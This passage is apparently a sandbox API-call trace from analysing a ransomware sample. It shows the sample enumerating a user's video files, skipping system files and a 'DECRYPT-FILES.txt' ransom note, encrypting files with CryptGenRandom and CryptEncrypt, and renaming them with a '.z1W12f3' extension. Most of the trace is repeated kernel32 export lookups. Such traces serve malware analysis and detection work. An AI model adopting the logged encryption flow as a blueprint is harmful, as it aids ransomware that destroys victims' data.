(lpString="ENUMCALENDARINFOEXW") returned 19 [0087.541] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0087.541] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0087.541] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0087.541] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0087.541] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0087.541] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0087.541] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0087.541] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0087.541] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0087.541] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0087.541] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0087.542] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0087.542] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\Rw_rswFYcem6TM.mp4") returned 72 [0087.542] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\Rw_rswFYcem6TM.mp4.z1W12f3") returned 80 [0087.542] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\Rw_rswFYcem6TM.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\rw_rswfycem6tm.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\Rw_rswFYcem6TM.mp4.z1W12f3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\rw_rswfycem6tm.mp4.z1w12f3"), dwFlags=0x0) returned 1 [0087.542] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.543] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.543] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.543] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef8b4550, ftCreationTime.dwHighDateTime=0x1d4ccf6, ftLastAccessTime.dwLowDateTime=0xce654d40, ftLastAccessTime.dwHighDateTime=0x1d4c755, ftLastWriteTime.dwLowDateTime=0xce654d40, ftLastWriteTime.dwHighDateTime=0x1d4c755, nFileSizeHigh=0x0, nFileSizeLow=0xb84d, dwReserved0=0x0, dwReserved1=0x0, cFileName="s4JsesqKNz4f.avi", cAlternateFileName="S4JSES~1.AVI")) returned 1 [0087.543] lstrcmpiW (lpString1="s4JsesqKNz4f.avi", lpString2="DECRYPT-FILES.txt") returned 1 [0087.543] lstrcmpiW (lpString1="s4JsesqKNz4f.avi", lpString2="autorun.inf") returned 1 [0087.543] lstrcmpiW (lpString1="s4JsesqKNz4f.avi", lpString2="boot.ini") returned 1 [0087.543] lstrcmpiW (lpString1="s4JsesqKNz4f.avi", lpString2="desktop.ini") returned 1 [0087.543] lstrcmpiW (lpString1="s4JsesqKNz4f.avi", lpString2="ntuser.dat") returned 1 [0087.543] lstrcmpiW (lpString1="s4JsesqKNz4f.avi", lpString2="iconcache.db") returned 1 [0087.543] lstrcmpiW (lpString1="s4JsesqKNz4f.avi", lpString2="bootsect.bak") returned 1 [0087.543] lstrcmpiW (lpString1="s4JsesqKNz4f.avi", lpString2="ntuser.dat.log") returned 1 [0087.543] lstrcmpiW (lpString1="s4JsesqKNz4f.avi", lpString2="thumbs.db") returned -1 [0087.544] lstrcmpiW (lpString1="s4JsesqKNz4f.avi", lpString2="Bootfont.bin") returned 1 [0087.544] lstrlenW (lpString="s4JsesqKNz4f.avi") returned 16 [0087.544] lstrcmpiW (lpString1="avi", lpString2="lnk") returned -1 [0087.544] lstrcmpiW (lpString1="avi", lpString2="exe") returned -1 [0087.544] lstrcmpiW (lpString1="avi", lpString2="sys") returned -1 [0087.544] lstrcmpiW (lpString1="avi", lpString2="dll") returned -1 [0087.544] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0087.544] lstrlenW (lpString="s4JsesqKNz4f.avi") returned 16 [0087.544] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0087.544] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="s4JsesqKNz4f.avi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\s4JsesqKNz4f.avi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\s4JsesqKNz4f.avi" [0087.544] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.544] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\s4JsesqKNz4f.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\s4jsesqknz4f.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0087.544] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=47181) returned 1 [0087.544] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0087.544] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0087.545] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0087.545] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0087.545] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.545] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0087.545] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0087.546] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.546] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0087.547] CloseHandle (hObject=0x42c) returned 1 [0087.547] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.547] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0087.548] CloseHandle (hObject=0x0) returned 0 [0087.548] CloseHandle (hObject=0x428) returned 1 [0087.548] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.548] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.549] GetTickCount () returned 0x114e550 [0087.549] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.549] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0087.549] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0087.549] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.549] lstrlenA (lpString="kernel32.dll") returned 12 [0087.549] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0087.550] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0087.550] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0087.550] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0087.550] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0087.550] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0087.550] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0087.550] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0087.550] lstrlenA (lpString="ADDATOMA") returned 8 [0087.550] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0087.550] lstrlenA (lpString="ADDATOMW") returned 8 [0087.550] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0087.550] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0087.550] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0087.550] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0087.550] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0087.550] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0087.550] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0087.550] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0087.550] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0087.550] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0087.550] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0087.550] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0087.550] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0087.550] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0087.550] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0087.550] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0087.550] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0087.550] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0087.550] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0087.550] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0087.550] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0087.550] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0087.550] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0087.550] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0087.550] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0087.550] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0087.550] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0087.550] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0087.551] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0087.551] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0087.551] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0087.551] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0087.551] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0087.551] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0087.551] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0087.551] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0087.551] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0087.551] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0087.551] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0087.551] lstrlenA (lpString="BACKUPREAD") returned 10 [0087.551] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0087.551] lstrlenA (lpString="BACKUPSEEK") returned 10 [0087.551] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0087.551] lstrlenA (lpString="BACKUPWRITE") returned 11 [0087.551] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0087.551] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0087.551] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0087.551] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0087.551] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0087.551] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0087.551] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0087.551] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0087.551] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0087.551] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0087.551] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0087.551] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0087.551] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0087.551] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0087.551] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0087.551] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0087.551] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0087.551] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0087.551] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0087.551] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0087.551] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0087.552] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0087.552] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0087.552] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0087.552] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0087.552] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0087.552] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0087.552] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0087.552] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0087.552] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0087.552] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0087.552] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0087.552] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0087.552] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0087.552] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0087.552] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0087.552] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0087.552] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0087.552] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0087.552] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0087.552] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0087.552] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0087.552] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0087.552] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0087.552] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0087.552] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0087.552] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0087.552] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0087.552] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0087.552] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0087.552] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0087.552] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0087.552] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0087.552] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0087.552] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0087.552] lstrlenA (lpString="BEEP") returned 4 [0087.552] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0087.552] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0087.553] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0087.553] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0087.553] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0087.553] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0087.553] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0087.553] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0087.553] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0087.553] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0087.553] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0087.553] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0087.553] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0087.553] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0087.553] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0087.553] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0087.553] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0087.553] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0087.553] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0087.553] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0087.553] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0087.553] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0087.553] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0087.553] lstrlenA (lpString="CANCELIO") returned 8 [0087.553] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0087.553] lstrlenA (lpString="CANCELIOEX") returned 10 [0087.553] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0087.553] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0087.553] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0087.553] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0087.553] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0087.553] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0087.553] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0087.553] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0087.553] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0087.553] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0087.553] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0087.553] lstrlenA (lpString="CHECKELEVATION") returned 14 [0087.553] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0087.554] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0087.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0087.554] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0087.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0087.554] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0087.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0087.554] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0087.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0087.554] lstrlenA 